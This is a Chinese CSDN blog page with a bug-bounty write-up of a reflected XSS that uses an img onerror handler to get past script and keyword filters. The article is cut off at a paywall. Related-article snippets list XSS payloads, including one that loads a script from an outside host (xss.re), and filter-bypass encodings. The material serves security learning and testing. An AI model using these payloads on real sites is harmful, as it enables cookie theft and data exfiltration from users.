反射型XSS-利用img绕过班花存放私密照的方案

最新推荐文章于 2024-10-15 10:00:28 发布
最新推荐文章于 2024-10-15 10:00:28 发布
阅读量1k 收藏
点赞数 2
文章标签: html html5 网络安全 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jklbnm12/article/details/120156844
版权
本文详细记录了挖掘一个反射型XSS漏洞的过程,通过img标签的onerror事件,绕过网站对JavaScript的过滤,尝试发送cookie到第三方站点。尽管面临httpOnly标志的限制和异步请求的问题,最终利用jQuery的load方法成功发送了个人敏感信息。作者强调了掌握前端知识、创新思维和坚持不懈在渗透测试中的重要性。
摘要由CSDN通过智能技术生成

前言:这是记录的前几天挖到的一个反射型xss漏洞,也是我在补天平台挖到的第一个专属src漏洞,详细的站点这里就不透露了,虽然目前查看了一下原漏洞已经被修补了。 1、挖掘的起点源于对某页…

前言:这是记录的前几天挖到的一个反射型xss漏洞,也是我在补天平台挖到的第一个专属src漏洞,详细的站点这里就不透露了,虽然目前查看了一下原漏洞已经被修补了。

1、挖掘的起点源于对某页面url中title参数的测试,该参数提交后被反射回来

<span class="brand\_left\_txt1" id="city">title</span>

2、测试符号

站点未对<>;=’”(){}进行过滤或者转义处理。(事实证明,我高兴早了~)

3、测试script标签

script被替换为了[removed]进行占位,尝试了大小写混杂,无效

4、其它标签

result.png

* 结果是ok的,在当前页面加载显示了百度的logo

5、尝试利用标签的属性和事件

这里有两个注意点:

1)如何触发事件

这里将src写为一个错误的地址,即可触发onerror事件

2)如何写事件

在这里,第一个难点是对alert、write等方法名进行了转换,转换为[removed]

最低0.47元/天 解锁文章
网安溦寀
关注
OpenRASP xss算法的几种绕过方法
HBohan的博客
07-21 493
openrasp默认只能检测反射XSS,存储XSS仅IAST商业版支持。对于反射xss,openrasp也只能检测可控输出点在html标签外的情况,本文的绕过方法是针对这种情况。如果可控输出点在html标签内,如或 内部,openrasp几乎检测不到。 测试环境 【网安学习资料】 windows / tomcat / jdk1.8 / openrasp 1.3.7-beta 测试环境部署参见https://www.anquanke.com/post/id/241107,或者官网文档。 在offici.
Xssimg标签的一些利用
weixin_34358365的博客
02-05 2187
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img> “><img src=x onerror=”with(document)body.appendChild(createElemen...
反射XSS(Reflected)DVWA全等级绕过方法
11-30 4004
本站所有文章均为原创,欢迎转载,请注明文章出处[https://blog.csdn.net/weixin_43847838/article/details/110358618](https://blog.csdn.net/weixin_43847838/article/details/110358618).。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
SRC混子的漏洞挖掘之道,零基础入门到精通,收藏这一篇就够了
最新发布
VN520的博客
10-15 1008
挖SRC需要有一个好心态,国内SRC生态并不是很好,SRC感觉更多的提供了一个相对安全的测试保障,所以更需要抱着一种学习的心态去挖,将我们学习的到的知识灵活运用,发现新的问题。不要想我今晚一定要挖到多少漏洞,要拿到多少奖金,不然可能会被忽略三连打崩心态。
xss反射
xu_1234567的博客
11-04 726
1.搭建靶场DVWA 本次xss实验测试在DVMA靶场环境下进行测试 DVWA下载地址 https://github.com/digininja/DVWA 1.反射xss原理 一. 将DVWA的难度级别设置为low 二. 尝试一般的xss攻击 <script>alert(1)</script> <body onload=alert(2)> <a href='' onclick=alert(3)>click1</a> #点击click1时弹
XSS中的script标签与img标签
05-12 1万+
我们知道XSS漏洞最常见的检测方式就是输入alert(‘xss’)来确认,大部分人在测试的时候就是直接使用类似alert(‘xss’)这样的输入,如果发现有弹出对话框就说明存在漏洞,如果没有对话框就认为不存在漏洞。那么,只使用标签是否就足够了呢? 我们知道另外也有一些其他的方式比如等等,那么这些方式之间有没有什么区别呢? 看看下面两个例子,第一个使用的alert(‘xss’):  f
网络安全 - Web 安全攻防 - 反射 XSS 实验包 - ReflectiveXSSLab.zip
09-22
通过实际操作,用户可以了解如何构造 XSS 攻击代码,以及如何通过各种手段绕过简单的输入验证和过滤机制。 实验包中可能包含的资源有: 1. **实验指南**:提供详细的步骤说明,指导用户如何设置实验环境,以及如何...
xss-labs-master.rar
05-09
"XSS-labs-master"提供了丰富的实战场景,每个关卡设计了不同的XSS攻击方式,玩家需找出并利用漏洞,实现目标。通过解谜式的学习,可以锻炼寻找、构造和利用XSS的能力。在实践中,你可以学习到如何发现潜在的注入点...
xss-labs-master源码
07-06
XSS防御中,客户端验证可以作为第一道防线,但更重要的防御措施应该在服务器端实施,因为客户端验证可以被绕过。 接下来是一系列的PHP文件,如"level9.php"、"level13.php"等,这些都是靶场的各个级别。PHP是...
php反射xss,利用反射XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 817
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
转:XSS中的script标签与img标签
ahltg62444的专栏
07-31 714
我们知道XSS漏洞最常见的检测方式就是输入<script>alert(‘xss’)</script>来确认,大部分人在测试的时候就是直接使用类似<script>alert(‘xss’)</script>这样的输入,如果发现有弹出对话框就说明存在漏洞,如果没有对话框就认为不存在漏洞。那么,只使用<script>标签是否就足够了呢?...
网络安全(2) -- 关于一次XSS攻击-图片(img标签)的onerror事件
热门推荐
TaneRoom的博客
11-08 2万+
记一次XSS实战攻击
图片引用功能导致的XSS漏洞
yggcwhat
09-29 2707
图片引用功能导致的XSS漏洞
XSS漏洞详解以及绕过方式。
m0_63028223的博客
05-14 1549
下列以dvwa靶场为例: 反射XSS: LOW级别 <script>alert('test')</script> 最基本的原理,就是前端对输入的内容过滤不严谨,是的输入的元素再html框架中得以运行。 medium级别 可能过滤了js标签,我们使用input标签, <input onblur=alert`1`>当input失去焦点时会触发 <input onclick=alert `123'> 当input获取焦点(点击输入)时触发
XSS漏洞讲解与多篇实战讲解
浪子燕青的博客
02-25 3505
跨站脚本攻击 XSS攻击基础 概述 个人对XSS攻击的原理认知: 原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得网页能够执行你添加的参数功能。 危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie,获取浏览器保存的账号密码 、获取屏幕截图,获取页面的数据,改变页面的逻辑,向服务器发送数据请求等。 情景:在挖洞的情景下,只要保证能弹个窗,或者执行js代码即可。但是
XSS讲解下(web安全入门11)
黑战士的博客
05-15 1886
一、XSS 的构造 1.1 利用[<>]构造 HTML/JS 可以利用[<>]构造 HTML 标签和] 1.2 伪协议 亦可以使用 JavaScript:伪协议的方式构造 XSS 在 IE 浏览器的地址栏中输入[javascript:alert(/XSS/);],弹框成功 提交参数[click me!] 点击超链接。即可触发 XSS 也可使用 img 标签的伪协议,但这种方法只在 IE6 下测试成功 [<img src="javascript:alert(/XSS/)">
php xss 防御 img,PHP的防御XSS注入的终极解决方案信息安全】【Hack】
weixin_33280038的博客
03-16 296
方法一,利用php htmlentities函数php防止XSS跨站脚本攻击的方法:是针对非法的HTML代码包括单双引号等,使用htmlspecialchars()函数 。在使用htmlspecialchars()函数的时候注意第二个参数, 直接用htmlspecialchars($string) 的话,第二个参数默认是ENT_COMPAT,函数默认只是转化双引号(“), 不对单引号(‘)做转义。...
前端常见安全漏洞
whaleluo的博客
05-11 2141
文章目录xss跨站脚本攻击csrf->xsrf跨站请求伪造攻击SSRF服务端请求构造点击劫持sql注入 xss跨站脚本攻击 以"文章发布系统"为例 input输入框输入字符串后使用v-html渲染成HTML显示在当前页面 当input输入script(sc里面的js不会执行) <script>alert(document.cookie)</script> 当input输入img标签的onerror回调(弹出cookie) <img src="test" on
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 6196
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
使用Burp Repeater检测和利用反射XSS漏洞
该文档是关于使用Burp Repeater工具测试反射跨站脚本(XSS)漏洞的教程。内容涵盖了如何通过Burp Repeater识别和利用这种类的漏洞,并从受害者的视角验证攻击。 在Web应用中,反射XSS漏洞发生于用户输入未经...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安溦寀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值